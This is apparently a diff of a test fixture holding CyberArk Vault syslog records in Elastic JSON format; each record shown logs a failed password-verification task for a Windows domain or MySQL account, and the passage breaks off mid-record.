"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). \n\n address=81.2.69.143;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). 
\n","ExtraDetails":"address=81.2.69.143;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=81.2.69.143;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n\n address=81.2.69.143;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=81.2.69.143;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=81.2.69.143;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <7>1 2021-03-15T16:56:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:56:29\n 2021-03-15T16:56:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:56:29","IsoTimestamp":"2021-03-15T16:56:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827245"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:01:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:01:07\n 2021-03-15T17:01:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:01:07","IsoTimestamp":"2021-03-15T17:01:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827554"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"mariadb"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . 
State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:05:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:05:47\n 2021-03-15T17:05:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:05:47","IsoTimestamp":"2021-03-15T17:05:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827864"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} 
@@ -11,5 +11,5 @@ <7>1 2021-03-15T17:33:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:33:17\n 2021-03-15T17:33:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:33:17","IsoTimestamp":"2021-03-15T17:33:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829597"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:38:27\n 2021-03-15T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:38:27","IsoTimestamp":"2021-03-15T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829907"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T18:00:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:00:07\n 2021-03-15T18:00:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:00:07","IsoTimestamp":"2021-03-15T18:00:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615831206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} -<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password 